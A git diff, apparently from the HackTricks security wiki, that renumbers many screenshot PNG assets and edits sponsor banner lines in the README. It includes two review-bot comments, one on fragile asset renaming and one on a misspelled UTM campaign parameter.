Binary files a/.gitbook/assets/image (866).png and b/.gitbook/assets/image (866).png differ
diff --git a/.gitbook/assets/image (867).png b/.gitbook/assets/image (867).png
index 2dbebc042..b2c2c3d26 100644
Binary files a/.gitbook/assets/image (867).png and b/.gitbook/assets/image (867).png differ
diff --git a/.gitbook/assets/image (868).png b/.gitbook/assets/image (868).png
index 5e89167c3..54eb3d289 100644
Binary files a/.gitbook/assets/image (868).png and b/.gitbook/assets/image (868).png differ
diff --git a/.gitbook/assets/image (869).png b/.gitbook/assets/image (869).png
index 1493a89e0..db465b8ed 100644
Binary files a/.gitbook/assets/image (869).png and b/.gitbook/assets/image (869).png differ
diff --git a/.gitbook/assets/image (87).png b/.gitbook/assets/image (87).png
index 629c1147c..aaae701f2 100644
Binary files a/.gitbook/assets/image (87).png and b/.gitbook/assets/image (87).png differ
diff --git a/.gitbook/assets/image (870).png b/.gitbook/assets/image (870).png
index a4ed42fd6..2dbebc042 100644
Binary files a/.gitbook/assets/image (870).png and b/.gitbook/assets/image (870).png differ
diff --git a/.gitbook/assets/image (871).png b/.gitbook/assets/image (871).png
index 8eb902501..5e89167c3 100644
Binary files a/.gitbook/assets/image (871).png and b/.gitbook/assets/image (871).png differ
diff --git a/.gitbook/assets/image (872).png b/.gitbook/assets/image (872).png
index c10b13489..1493a89e0 100644
Binary files a/.gitbook/assets/image (872).png and b/.gitbook/assets/image (872).png differ
diff --git a/.gitbook/assets/image (873).png b/.gitbook/assets/image (873).png
index 6c314ff31..a4ed42fd6 100644
Binary files a/.gitbook/assets/image (873).png and b/.gitbook/assets/image (873).png differ
diff --git a/.gitbook/assets/image (874).png b/.gitbook/assets/image (874).png
index f716e189c..8eb902501 100644
Binary files a/.gitbook/assets/image (874).png and b/.gitbook/assets/image (874).png differ
diff --git a/.gitbook/assets/image (875).png b/.gitbook/assets/image (875).png
index c6e1bd7d5..c10b13489 100644
Binary files a/.gitbook/assets/image (875).png and b/.gitbook/assets/image (875).png differ
diff --git a/.gitbook/assets/image (876).png b/.gitbook/assets/image (876).png
index 7f601f09f..6c314ff31 100644
Binary files a/.gitbook/assets/image (876).png and b/.gitbook/assets/image (876).png differ
diff --git a/.gitbook/assets/image (877).png b/.gitbook/assets/image (877).png
index b42b37ed3..f716e189c 100644
Binary files a/.gitbook/assets/image (877).png and b/.gitbook/assets/image (877).png differ
diff --git a/.gitbook/assets/image (878).png b/.gitbook/assets/image (878).png
index 455fbb8b7..c6e1bd7d5 100644
Binary files a/.gitbook/assets/image (878).png and b/.gitbook/assets/image (878).png differ
diff --git a/.gitbook/assets/image (879).png b/.gitbook/assets/image (879).png
index 7510b6e7e..7f601f09f 100644
Binary files a/.gitbook/assets/image (879).png and b/.gitbook/assets/image (879).png differ
diff --git a/.gitbook/assets/image (88).png b/.gitbook/assets/image (88).png
index c70eb8753..5c863f6d1 100644
Binary files a/.gitbook/assets/image (88).png and b/.gitbook/assets/image (88).png differ
diff --git a/.gitbook/assets/image (880).png b/.gitbook/assets/image (880).png
index 877c67db1..b42b37ed3 100644
Binary files a/.gitbook/assets/image (880).png and b/.gitbook/assets/image (880).png differ
diff --git a/.gitbook/assets/image (881).png b/.gitbook/assets/image (881).png
index b892f104b..455fbb8b7 100644
Binary files a/.gitbook/assets/image (881).png and b/.gitbook/assets/image (881).png differ
diff --git a/.gitbook/assets/image (882).png b/.gitbook/assets/image (882).png
index 55ab26cc8..7510b6e7e 100644
Binary files a/.gitbook/assets/image (882).png and b/.gitbook/assets/image (882).png differ
diff --git a/.gitbook/assets/image (883).png b/.gitbook/assets/image (883).png
index add6a58e9..877c67db1 100644
Binary files a/.gitbook/assets/image (883).png and b/.gitbook/assets/image (883).png differ
diff --git a/.gitbook/assets/image (884).png b/.gitbook/assets/image (884).png
index 37acf9e4c..b892f104b 100644
Binary files a/.gitbook/assets/image (884).png and b/.gitbook/assets/image (884).png differ
diff --git a/.gitbook/assets/image (885).png b/.gitbook/assets/image (885).png
index 01191414e..55ab26cc8 100644
Binary files a/.gitbook/assets/image (885).png and b/.gitbook/assets/image (885).png differ
diff --git a/.gitbook/assets/image (886).png b/.gitbook/assets/image (886).png
index 128d84542..add6a58e9 100644
Binary files a/.gitbook/assets/image (886).png and b/.gitbook/assets/image (886).png differ
diff --git a/.gitbook/assets/image (887).png b/.gitbook/assets/image (887).png
index e88ab8866..37acf9e4c 100644
Binary files a/.gitbook/assets/image (887).png and b/.gitbook/assets/image (887).png differ
diff --git a/.gitbook/assets/image (888).png b/.gitbook/assets/image (888).png
index 743a0e187..01191414e 100644
Binary files a/.gitbook/assets/image (888).png and b/.gitbook/assets/image (888).png differ
diff --git a/.gitbook/assets/image (889).png b/.gitbook/assets/image (889).png
index 0f8af75bf..128d84542 100644
Binary files a/.gitbook/assets/image (889).png and b/.gitbook/assets/image (889).png differ
diff --git a/.gitbook/assets/image (89).png b/.gitbook/assets/image (89).png
index d56598b83..2758b36d6 100644
Binary files a/.gitbook/assets/image (89).png and b/.gitbook/assets/image (89).png differ
diff --git a/.gitbook/assets/image (890).png b/.gitbook/assets/image (890).png
index 4d6681deb..e88ab8866 100644
Binary files a/.gitbook/assets/image (890).png and b/.gitbook/assets/image (890).png differ
diff --git a/.gitbook/assets/image (891).png b/.gitbook/assets/image (891).png
index a452e6ad8..743a0e187 100644
Binary files a/.gitbook/assets/image (891).png and b/.gitbook/assets/image (891).png differ
diff --git a/.gitbook/assets/image (892).png b/.gitbook/assets/image (892).png
index 5d191ec02..0f8af75bf 100644
Binary files a/.gitbook/assets/image (892).png and b/.gitbook/assets/image (892).png differ
diff --git a/.gitbook/assets/image (893).png b/.gitbook/assets/image (893).png
index da99a7c62..4d6681deb 100644
Binary files a/.gitbook/assets/image (893).png and b/.gitbook/assets/image (893).png differ
diff --git a/.gitbook/assets/image (894).png b/.gitbook/assets/image (894).png
index f59a94966..a452e6ad8 100644
Binary files a/.gitbook/assets/image (894).png and b/.gitbook/assets/image (894).png differ
diff --git a/.gitbook/assets/image (895).png b/.gitbook/assets/image (895).png
index 8f1f2230b..5d191ec02 100644
Binary files a/.gitbook/assets/image (895).png and b/.gitbook/assets/image (895).png differ
diff --git a/.gitbook/assets/image (896).png b/.gitbook/assets/image (896).png
index b64184f9f..da99a7c62 100644
Binary files a/.gitbook/assets/image (896).png and b/.gitbook/assets/image (896).png differ
diff --git a/.gitbook/assets/image (897).png b/.gitbook/assets/image (897).png
index 0cadfb948..f59a94966 100644
Binary files a/.gitbook/assets/image (897).png and b/.gitbook/assets/image (897).png differ
diff --git a/.gitbook/assets/image (898).png b/.gitbook/assets/image (898).png
index 4bb5f2707..8f1f2230b 100644
Binary files a/.gitbook/assets/image (898).png and b/.gitbook/assets/image (898).png differ
diff --git a/.gitbook/assets/image (899).png b/.gitbook/assets/image (899).png
index d0ab0ee19..b64184f9f 100644
Binary files a/.gitbook/assets/image (899).png and b/.gitbook/assets/image (899).png differ
diff --git a/.gitbook/assets/image (9).png b/.gitbook/assets/image (9).png
index 1a985c3d4..2c0467343 100644
Binary files a/.gitbook/assets/image (9).png and b/.gitbook/assets/image (9).png differ
diff --git a/.gitbook/assets/image (90).png b/.gitbook/assets/image (90).png
index 530b24646..629c1147c 100644
Binary files a/.gitbook/assets/image (90).png and b/.gitbook/assets/image (90).png differ
diff --git a/.gitbook/assets/image (900).png b/.gitbook/assets/image (900).png
index 592a4e1a0..0cadfb948 100644
Binary files a/.gitbook/assets/image (900).png and b/.gitbook/assets/image (900).png differ
diff --git a/.gitbook/assets/image (901).png b/.gitbook/assets/image (901).png
index c90bad4be..4bb5f2707 100644
Binary files a/.gitbook/assets/image (901).png and b/.gitbook/assets/image (901).png differ
diff --git a/.gitbook/assets/image (902).png b/.gitbook/assets/image (902).png
index bbff6c5f4..d0ab0ee19 100644
Binary files a/.gitbook/assets/image (902).png and b/.gitbook/assets/image (902).png differ
diff --git a/.gitbook/assets/image (903).png b/.gitbook/assets/image (903).png
index 606702899..592a4e1a0 100644
Binary files a/.gitbook/assets/image (903).png and b/.gitbook/assets/image (903).png differ
diff --git a/.gitbook/assets/image (904).png b/.gitbook/assets/image (904).png
index 757655716..c90bad4be 100644
Binary files a/.gitbook/assets/image (904).png and b/.gitbook/assets/image (904).png differ
diff --git a/.gitbook/assets/image (905).png b/.gitbook/assets/image (905).png
index 5109dd9b3..bbff6c5f4 100644
Binary files a/.gitbook/assets/image (905).png and b/.gitbook/assets/image (905).png differ
diff --git a/.gitbook/assets/image (906).png b/.gitbook/assets/image (906).png
index 3733248ec..606702899 100644
Binary files a/.gitbook/assets/image (906).png and b/.gitbook/assets/image (906).png differ
diff --git a/.gitbook/assets/image (907).png b/.gitbook/assets/image (907).png
index e1f6894bd..757655716 100644
Binary files a/.gitbook/assets/image (907).png and b/.gitbook/assets/image (907).png differ
diff --git a/.gitbook/assets/image (908).png b/.gitbook/assets/image (908).png
index 1e2588800..5109dd9b3 100644
Binary files a/.gitbook/assets/image (908).png and b/.gitbook/assets/image (908).png differ
diff --git a/.gitbook/assets/image (909).png b/.gitbook/assets/image (909).png
index 9cc426fc7..3733248ec 100644
Binary files a/.gitbook/assets/image (909).png and b/.gitbook/assets/image (909).png differ
diff --git a/.gitbook/assets/image (91).png b/.gitbook/assets/image (91).png
index 8fd9221ae..c70eb8753 100644
Binary files a/.gitbook/assets/image (91).png and b/.gitbook/assets/image (91).png differ
diff --git a/.gitbook/assets/image (910).png b/.gitbook/assets/image (910).png
index 13d44115a..e1f6894bd 100644
Binary files a/.gitbook/assets/image (910).png and b/.gitbook/assets/image (910).png differ
diff --git a/.gitbook/assets/image (911).png b/.gitbook/assets/image (911).png
index 3ec420eb9..1e2588800 100644
Binary files a/.gitbook/assets/image (911).png and b/.gitbook/assets/image (911).png differ
diff --git a/.gitbook/assets/image (912).png b/.gitbook/assets/image (912).png
index 3305c8600..9cc426fc7 100644
Binary files a/.gitbook/assets/image (912).png and b/.gitbook/assets/image (912).png differ
diff --git a/.gitbook/assets/image (913).png b/.gitbook/assets/image (913).png
index 261b7c009..13d44115a 100644
Binary files a/.gitbook/assets/image (913).png and b/.gitbook/assets/image (913).png differ
diff --git a/.gitbook/assets/image (914).png b/.gitbook/assets/image (914).png
index ed2eac533..3ec420eb9 100644
Binary files a/.gitbook/assets/image (914).png and b/.gitbook/assets/image (914).png differ
diff --git a/.gitbook/assets/image (915).png b/.gitbook/assets/image (915).png
index d15c166d5..3305c8600 100644
Binary files a/.gitbook/assets/image (915).png and b/.gitbook/assets/image (915).png differ
diff --git a/.gitbook/assets/image (916).png b/.gitbook/assets/image (916).png
index 5d2bec98a..261b7c009 100644
Binary files a/.gitbook/assets/image (916).png and b/.gitbook/assets/image (916).png differ
diff --git a/.gitbook/assets/image (917).png b/.gitbook/assets/image (917).png
index 4d56204f7..ed2eac533 100644
Binary files a/.gitbook/assets/image (917).png and b/.gitbook/assets/image (917).png differ
diff --git a/.gitbook/assets/image (918).png b/.gitbook/assets/image (918).png
index 07983c822..d15c166d5 100644
Binary files a/.gitbook/assets/image (918).png and b/.gitbook/assets/image (918).png differ
diff --git a/.gitbook/assets/image (919).png b/.gitbook/assets/image (919).png
index f99d130d7..5d2bec98a 100644
Binary files a/.gitbook/assets/image (919).png and b/.gitbook/assets/image (919).png differ
diff --git a/.gitbook/assets/image (92).png b/.gitbook/assets/image (92).png
index c17689b99..d56598b83 100644
Binary files a/.gitbook/assets/image (92).png and b/.gitbook/assets/image (92).png differ
diff --git a/.gitbook/assets/image (920).png b/.gitbook/assets/image (920).png
index bda84db54..4d56204f7 100644
Binary files a/.gitbook/assets/image (920).png and b/.gitbook/assets/image (920).png differ
diff --git a/.gitbook/assets/image (921).png b/.gitbook/assets/image (921).png
index 357f8f6e1..07983c822 100644
Binary files a/.gitbook/assets/image (921).png and b/.gitbook/assets/image (921).png differ
diff --git a/.gitbook/assets/image (922).png b/.gitbook/assets/image (922).png
index 84884c474..f99d130d7 100644
Binary files a/.gitbook/assets/image (922).png and b/.gitbook/assets/image (922).png differ
diff --git a/.gitbook/assets/image (923).png b/.gitbook/assets/image (923).png
index 5895dc2dd..bda84db54 100644
Binary files a/.gitbook/assets/image (923).png and b/.gitbook/assets/image (923).png differ
diff --git a/.gitbook/assets/image (924).png b/.gitbook/assets/image (924).png
index 17aedd90c..357f8f6e1 100644
Binary files a/.gitbook/assets/image (924).png and b/.gitbook/assets/image (924).png differ
diff --git a/.gitbook/assets/image (925).png b/.gitbook/assets/image (925).png
index 816c11115..84884c474 100644
Binary files a/.gitbook/assets/image (925).png and b/.gitbook/assets/image (925).png differ
diff --git a/.gitbook/assets/image (926).png b/.gitbook/assets/image (926).png
index 1978dd558..5895dc2dd 100644
Binary files a/.gitbook/assets/image (926).png and b/.gitbook/assets/image (926).png differ
diff --git a/.gitbook/assets/image (927).png b/.gitbook/assets/image (927).png
index af5dbbe3d..17aedd90c 100644
Binary files a/.gitbook/assets/image (927).png and b/.gitbook/assets/image (927).png differ
diff --git a/.gitbook/assets/image (928).png b/.gitbook/assets/image (928).png
index 831449f43..816c11115 100644
Binary files a/.gitbook/assets/image (928).png and b/.gitbook/assets/image (928).png differ
diff --git a/.gitbook/assets/image (929).png b/.gitbook/assets/image (929).png
index b9465118c..1978dd558 100644
Binary files a/.gitbook/assets/image (929).png and b/.gitbook/assets/image (929).png differ
diff --git a/.gitbook/assets/image (93).png b/.gitbook/assets/image (93).png
index 9c566b1b7..530b24646 100644
Binary files a/.gitbook/assets/image (93).png and b/.gitbook/assets/image (93).png differ
diff --git a/.gitbook/assets/image (930).png b/.gitbook/assets/image (930).png
index ad1f05669..af5dbbe3d 100644
Binary files a/.gitbook/assets/image (930).png and b/.gitbook/assets/image (930).png differ
diff --git a/.gitbook/assets/image (931).png b/.gitbook/assets/image (931).png
index 06900bd58..831449f43 100644
Binary files a/.gitbook/assets/image (931).png and b/.gitbook/assets/image (931).png differ
diff --git a/.gitbook/assets/image (932).png b/.gitbook/assets/image (932).png
index b95243241..b9465118c 100644
Binary files a/.gitbook/assets/image (932).png and b/.gitbook/assets/image (932).png differ
diff --git a/.gitbook/assets/image (933).png b/.gitbook/assets/image (933).png
index 15dc4be80..ad1f05669 100644
Binary files a/.gitbook/assets/image (933).png and b/.gitbook/assets/image (933).png differ
diff --git a/.gitbook/assets/image (934).png b/.gitbook/assets/image (934).png
index eb57ea914..06900bd58 100644
Binary files a/.gitbook/assets/image (934).png and b/.gitbook/assets/image (934).png differ
diff --git a/.gitbook/assets/image (935).png b/.gitbook/assets/image (935).png
index 0f8a86733..b95243241 100644
Binary files a/.gitbook/assets/image (935).png and b/.gitbook/assets/image (935).png differ
diff --git a/.gitbook/assets/image (936).png b/.gitbook/assets/image (936).png
index 0ac7ed6c9..15dc4be80 100644
Binary files a/.gitbook/assets/image (936).png and b/.gitbook/assets/image (936).png differ
diff --git a/.gitbook/assets/image (937).png b/.gitbook/assets/image (937).png
index 37ab1a51d..eb57ea914 100644
Binary files a/.gitbook/assets/image (937).png and b/.gitbook/assets/image (937).png differ
diff --git a/.gitbook/assets/image (938).png b/.gitbook/assets/image (938).png
index ec4d7c9ff..0f8a86733 100644
Binary files a/.gitbook/assets/image (938).png and b/.gitbook/assets/image (938).png differ
diff --git a/.gitbook/assets/image (939).png b/.gitbook/assets/image (939).png
index d979f9cf7..0ac7ed6c9 100644
Binary files a/.gitbook/assets/image (939).png and b/.gitbook/assets/image (939).png differ
diff --git a/.gitbook/assets/image (94).png b/.gitbook/assets/image (94).png
index 5dc69a4e7..8fd9221ae 100644
Binary files a/.gitbook/assets/image (94).png and b/.gitbook/assets/image (94).png differ
diff --git a/.gitbook/assets/image (940).png b/.gitbook/assets/image (940).png
index ffd8adf04..37ab1a51d 100644
Binary files a/.gitbook/assets/image (940).png and b/.gitbook/assets/image (940).png differ
diff --git a/.gitbook/assets/image (941).png b/.gitbook/assets/image (941).png
index 383a5938f..ec4d7c9ff 100644
Binary files a/.gitbook/assets/image (941).png and b/.gitbook/assets/image (941).png differ
diff --git a/.gitbook/assets/image (942).png b/.gitbook/assets/image (942).png
index c0008cb7b..d979f9cf7 100644
Binary files a/.gitbook/assets/image (942).png and b/.gitbook/assets/image (942).png differ
diff --git a/.gitbook/assets/image (943).png b/.gitbook/assets/image (943).png
index 811b2066d..ffd8adf04 100644
Binary files a/.gitbook/assets/image (943).png and b/.gitbook/assets/image (943).png differ
diff --git a/.gitbook/assets/image (944).png b/.gitbook/assets/image (944).png
index 22eebd987..383a5938f 100644
Binary files a/.gitbook/assets/image (944).png and b/.gitbook/assets/image (944).png differ
diff --git a/.gitbook/assets/image (945).png b/.gitbook/assets/image (945).png
index 8a4bb9a4a..c0008cb7b 100644
Binary files a/.gitbook/assets/image (945).png and b/.gitbook/assets/image (945).png differ
diff --git a/.gitbook/assets/image (946).png b/.gitbook/assets/image (946).png
index 5ffa89035..811b2066d 100644
Binary files a/.gitbook/assets/image (946).png and b/.gitbook/assets/image (946).png differ
diff --git a/.gitbook/assets/image (947).png b/.gitbook/assets/image (947).png
index a4059618a..22eebd987 100644
Binary files a/.gitbook/assets/image (947).png and b/.gitbook/assets/image (947).png differ
diff --git a/.gitbook/assets/image (948).png b/.gitbook/assets/image (948).png
index f1359eecf..8a4bb9a4a 100644
Binary files a/.gitbook/assets/image (948).png and b/.gitbook/assets/image (948).png differ
diff --git a/.gitbook/assets/image (949).png b/.gitbook/assets/image (949).png
index 722af5f5c..5ffa89035 100644
Binary files a/.gitbook/assets/image (949).png and b/.gitbook/assets/image (949).png differ
diff --git a/.gitbook/assets/image (95).png b/.gitbook/assets/image (95).png
index 33653dcb1..c17689b99 100644
Binary files a/.gitbook/assets/image (95).png and b/.gitbook/assets/image (95).png differ
diff --git a/.gitbook/assets/image (950).png b/.gitbook/assets/image (950).png
index 58a0172e5..a4059618a 100644
Binary files a/.gitbook/assets/image (950).png and b/.gitbook/assets/image (950).png differ
diff --git a/.gitbook/assets/image (951).png b/.gitbook/assets/image (951).png
index 347f7abbb..f1359eecf 100644
Binary files a/.gitbook/assets/image (951).png and b/.gitbook/assets/image (951).png differ
diff --git a/.gitbook/assets/image (952).png b/.gitbook/assets/image (952).png
index 474931f56..722af5f5c 100644
Binary files a/.gitbook/assets/image (952).png and b/.gitbook/assets/image (952).png differ
diff --git a/.gitbook/assets/image (953).png b/.gitbook/assets/image (953).png
index 8c39d83aa..58a0172e5 100644
Binary files a/.gitbook/assets/image (953).png and b/.gitbook/assets/image (953).png differ
diff --git a/.gitbook/assets/image (954).png b/.gitbook/assets/image (954).png
index 9f0290b72..347f7abbb 100644
Binary files a/.gitbook/assets/image (954).png and b/.gitbook/assets/image (954).png differ
diff --git a/.gitbook/assets/image (955).png b/.gitbook/assets/image (955).png
index 3f805b3ce..474931f56 100644
Binary files a/.gitbook/assets/image (955).png and b/.gitbook/assets/image (955).png differ
diff --git a/.gitbook/assets/image (956).png b/.gitbook/assets/image (956).png
index addb8bdde..8c39d83aa 100644
Binary files a/.gitbook/assets/image (956).png and b/.gitbook/assets/image (956).png differ
diff --git a/.gitbook/assets/image (957).png b/.gitbook/assets/image (957).png
index 226538de2..9f0290b72 100644
Binary files a/.gitbook/assets/image (957).png and b/.gitbook/assets/image (957).png differ
diff --git a/.gitbook/assets/image (958).png b/.gitbook/assets/image (958).png
index 84874207b..3f805b3ce 100644
Binary files a/.gitbook/assets/image (958).png and b/.gitbook/assets/image (958).png differ
diff --git a/.gitbook/assets/image (959).png b/.gitbook/assets/image (959).png
index c4b1b5d48..addb8bdde 100644
Binary files a/.gitbook/assets/image (959).png and b/.gitbook/assets/image (959).png differ
diff --git a/.gitbook/assets/image (96).png b/.gitbook/assets/image (96).png
index 1f3811eca..9c566b1b7 100644
Binary files a/.gitbook/assets/image (96).png and b/.gitbook/assets/image (96).png differ
diff --git a/.gitbook/assets/image (960).png b/.gitbook/assets/image (960).png
index 24c2844c3..226538de2 100644
Binary files a/.gitbook/assets/image (960).png and b/.gitbook/assets/image (960).png differ
diff --git a/.gitbook/assets/image (961).png b/.gitbook/assets/image (961).png
index ee9f710d4..84874207b 100644
Binary files a/.gitbook/assets/image (961).png and b/.gitbook/assets/image (961).png differ
diff --git a/.gitbook/assets/image (962).png b/.gitbook/assets/image (962).png
index 2528d1e23..c4b1b5d48 100644
Binary files a/.gitbook/assets/image (962).png and b/.gitbook/assets/image (962).png differ
diff --git a/.gitbook/assets/image (963).png b/.gitbook/assets/image (963).png
index 16db588fc..24c2844c3 100644
Binary files a/.gitbook/assets/image (963).png and b/.gitbook/assets/image (963).png differ
diff --git a/.gitbook/assets/image (964).png b/.gitbook/assets/image (964).png
index 1f7dea20a..ee9f710d4 100644
Binary files a/.gitbook/assets/image (964).png and b/.gitbook/assets/image (964).png differ
diff --git a/.gitbook/assets/image (965).png b/.gitbook/assets/image (965).png
index 674171522..2528d1e23 100644
Binary files a/.gitbook/assets/image (965).png and b/.gitbook/assets/image (965).png differ
diff --git a/.gitbook/assets/image (966).png b/.gitbook/assets/image (966).png
index cfef5b39f..16db588fc 100644
Binary files a/.gitbook/assets/image (966).png and b/.gitbook/assets/image (966).png differ
diff --git a/.gitbook/assets/image (967).png b/.gitbook/assets/image (967).png
index 07aa1e747..1f7dea20a 100644
Binary files a/.gitbook/assets/image (967).png and b/.gitbook/assets/image (967).png differ
diff --git a/.gitbook/assets/image (968).png b/.gitbook/assets/image (968).png
index 6ee1afc03..674171522 100644
Binary files a/.gitbook/assets/image (968).png and b/.gitbook/assets/image (968).png differ
diff --git a/.gitbook/assets/image (969).png b/.gitbook/assets/image (969).png
index 1defaaff1..cfef5b39f 100644
Binary files a/.gitbook/assets/image (969).png and b/.gitbook/assets/image (969).png differ
diff --git a/.gitbook/assets/image (97).png b/.gitbook/assets/image (97).png
index 2fde683ec..5dc69a4e7 100644
Binary files a/.gitbook/assets/image (97).png and b/.gitbook/assets/image (97).png differ
diff --git a/.gitbook/assets/image (970).png b/.gitbook/assets/image (970).png
index 35ddb985b..07aa1e747 100644
Binary files a/.gitbook/assets/image (970).png and b/.gitbook/assets/image (970).png differ
diff --git a/.gitbook/assets/image (971).png b/.gitbook/assets/image (971).png
index c072058b6..6ee1afc03 100644
Binary files a/.gitbook/assets/image (971).png and b/.gitbook/assets/image (971).png differ
diff --git a/.gitbook/assets/image (972).png b/.gitbook/assets/image (972).png
index 90dd85e30..1defaaff1 100644
Binary files a/.gitbook/assets/image (972).png and b/.gitbook/assets/image (972).png differ
diff --git a/.gitbook/assets/image (973).png b/.gitbook/assets/image (973).png
index 4f2c9b758..35ddb985b 100644
Binary files a/.gitbook/assets/image (973).png and b/.gitbook/assets/image (973).png differ
diff --git a/.gitbook/assets/image (974).png b/.gitbook/assets/image (974).png
index d6a565eb6..c072058b6 100644
Binary files a/.gitbook/assets/image (974).png and b/.gitbook/assets/image (974).png differ
diff --git a/.gitbook/assets/image (975).png b/.gitbook/assets/image (975).png
index 7ebf7f05b..90dd85e30 100644
Binary files a/.gitbook/assets/image (975).png and b/.gitbook/assets/image (975).png differ
diff --git a/.gitbook/assets/image (976).png b/.gitbook/assets/image (976).png
index 4d79f5764..4f2c9b758 100644
Binary files a/.gitbook/assets/image (976).png and b/.gitbook/assets/image (976).png differ
diff --git a/.gitbook/assets/image (977).png b/.gitbook/assets/image (977).png
index 3269b7f67..d6a565eb6 100644
Binary files a/.gitbook/assets/image (977).png and b/.gitbook/assets/image (977).png differ
diff --git a/.gitbook/assets/image (978).png b/.gitbook/assets/image (978).png
index 9d8662682..7ebf7f05b 100644
Binary files a/.gitbook/assets/image (978).png and b/.gitbook/assets/image (978).png differ
diff --git a/.gitbook/assets/image (979).png b/.gitbook/assets/image (979).png
index 13f03d4b7..4d79f5764 100644
Binary files a/.gitbook/assets/image (979).png and b/.gitbook/assets/image (979).png differ
diff --git a/.gitbook/assets/image (98).png b/.gitbook/assets/image (98).png
index 53a923405..33653dcb1 100644
Binary files a/.gitbook/assets/image (98).png and b/.gitbook/assets/image (98).png differ
diff --git a/.gitbook/assets/image (980).png b/.gitbook/assets/image (980).png
index ffea8afba..3269b7f67 100644
Binary files a/.gitbook/assets/image (980).png and b/.gitbook/assets/image (980).png differ
diff --git a/.gitbook/assets/image (981).png b/.gitbook/assets/image (981).png
index e34331290..9d8662682 100644
Binary files a/.gitbook/assets/image (981).png and b/.gitbook/assets/image (981).png differ
diff --git a/.gitbook/assets/image (982).png b/.gitbook/assets/image (982).png
index c4bf20c0f..13f03d4b7 100644
Binary files a/.gitbook/assets/image (982).png and b/.gitbook/assets/image (982).png differ
diff --git a/.gitbook/assets/image (983).png b/.gitbook/assets/image (983).png
index 9026552a7..ffea8afba 100644
Binary files a/.gitbook/assets/image (983).png and b/.gitbook/assets/image (983).png differ
diff --git a/.gitbook/assets/image (984).png b/.gitbook/assets/image (984).png
index 597457563..e34331290 100644
Binary files a/.gitbook/assets/image (984).png and b/.gitbook/assets/image (984).png differ
diff --git a/.gitbook/assets/image (985).png b/.gitbook/assets/image (985).png
index d504c55ec..c4bf20c0f 100644
Binary files a/.gitbook/assets/image (985).png and b/.gitbook/assets/image (985).png differ
diff --git a/.gitbook/assets/image (986).png b/.gitbook/assets/image (986).png
index ab5d833dc..9026552a7 100644
Binary files a/.gitbook/assets/image (986).png and b/.gitbook/assets/image (986).png differ
diff --git a/.gitbook/assets/image (987).png b/.gitbook/assets/image (987).png
index 97522921c..597457563 100644
Binary files a/.gitbook/assets/image (987).png and b/.gitbook/assets/image (987).png differ
diff --git a/.gitbook/assets/image (988).png b/.gitbook/assets/image (988).png
index 1065c7b82..d504c55ec 100644
Binary files a/.gitbook/assets/image (988).png and b/.gitbook/assets/image (988).png differ
diff --git a/.gitbook/assets/image (989).png b/.gitbook/assets/image (989).png
index e73c84494..ab5d833dc 100644
Binary files a/.gitbook/assets/image (989).png and b/.gitbook/assets/image (989).png differ
diff --git a/.gitbook/assets/image (99).png b/.gitbook/assets/image (99).png
index 8b7813787..1f3811eca 100644
Binary files a/.gitbook/assets/image (99).png and b/.gitbook/assets/image (99).png differ
diff --git a/.gitbook/assets/image (990).png b/.gitbook/assets/image (990).png
index 422cbdc04..97522921c 100644
Binary files a/.gitbook/assets/image (990).png and b/.gitbook/assets/image (990).png differ
diff --git a/.gitbook/assets/image (991).png b/.gitbook/assets/image (991).png
index f33c3c9b5..1065c7b82 100644
Binary files a/.gitbook/assets/image (991).png and b/.gitbook/assets/image (991).png differ
diff --git a/.gitbook/assets/image (992).png b/.gitbook/assets/image (992).png
index 77284ef32..e73c84494 100644
Binary files a/.gitbook/assets/image (992).png and b/.gitbook/assets/image (992).png differ
diff --git a/.gitbook/assets/image (993).png b/.gitbook/assets/image (993).png
index ca3f3bb95..422cbdc04 100644
Binary files a/.gitbook/assets/image (993).png and b/.gitbook/assets/image (993).png differ
diff --git a/.gitbook/assets/image (994).png b/.gitbook/assets/image (994).png
index 2eafdd175..f33c3c9b5 100644
Binary files a/.gitbook/assets/image (994).png and b/.gitbook/assets/image (994).png differ
diff --git a/.gitbook/assets/image (995).png b/.gitbook/assets/image (995).png
index 49dbc7536..77284ef32 100644
Binary files a/.gitbook/assets/image (995).png and b/.gitbook/assets/image (995).png differ
diff --git a/.gitbook/assets/image (996).png b/.gitbook/assets/image (996).png
index 47a9e657a..ca3f3bb95 100644
Binary files a/.gitbook/assets/image (996).png and b/.gitbook/assets/image (996).png differ
diff --git a/.gitbook/assets/image (997).png b/.gitbook/assets/image (997).png
index 8275bf4e1..2eafdd175 100644
Binary files a/.gitbook/assets/image (997).png and b/.gitbook/assets/image (997).png differ
diff --git a/.gitbook/assets/image (998).png b/.gitbook/assets/image (998).png
index 088cfb275..49dbc7536 100644
Binary files a/.gitbook/assets/image (998).png and b/.gitbook/assets/image (998).png differ
diff --git a/.gitbook/assets/image (999).png b/.gitbook/assets/image (999).png
index e146bcdd2..47a9e657a 100644
Binary files a/.gitbook/assets/image (999).png and b/.gitbook/assets/image (999).png differ
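Review bot: the asset diffs above show existing blobs rotating between numbered file names rather than new images being added. For example, image (873).png now holds a4ed42fd6, which was the previous content of image (870).png, and image (90).png now holds 629c1147c, previously the content of image (87).png. Renumbering like this means every markdown reference has to be bumped by the same offset in the same commit, and any reference that is missed will silently render a different screenshot. Consider stable, descriptive asset names, or include a check of image links on pages this commit does not touch.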
diff --git a/README.md b/README.md
index a58071968..771bbe95f 100644
--- a/README.md
+++ b/README.md
@@ -30,7 +30,7 @@ You can check their **blog** in [**https://blog.stmcyber.com**](https://blog.stm
### [RootedCON](https://www.rootedcon.com/)
-
+
[**RootedCON**](https://www.rootedcon.com) is the most relevant cybersecurity event in **Spain** and one of the most important in **Europe**. With **the mission of promoting technical knowledge**, this congress is a boiling meeting point for technology and cybersecurity professionals in every discipline.
@@ -40,7 +40,7 @@ You can check their **blog** in [**https://blog.stmcyber.com**](https://blog.stm
### [Intigriti](https://www.intigriti.com)
-
+
**Intigriti** is the **Europe's #1** ethical hacking and **bug bounty platform.**
@@ -52,7 +52,7 @@ You can check their **blog** in [**https://blog.stmcyber.com**](https://blog.stm
### [Trickest](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks)
-
+
\
Use [**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks) to easily build and **automate workflows** powered by the world's **most advanced** community tools.
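Review bot: both Trickest links in this hunk's context carry `utm_campaign=hacktrics` while the same URL uses `utm_source=hacktricks`, so the campaign value looks like a typo. Since the banner above these lines is being touched anyway, correct the parameter in the heading and in the body link, or confirm with the sponsor that the misspelled campaign name is intentional.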
@@ -65,7 +65,7 @@ Get Access Today:
### [HACKENPROOF](https://bit.ly/3xrrDrL)
-
+
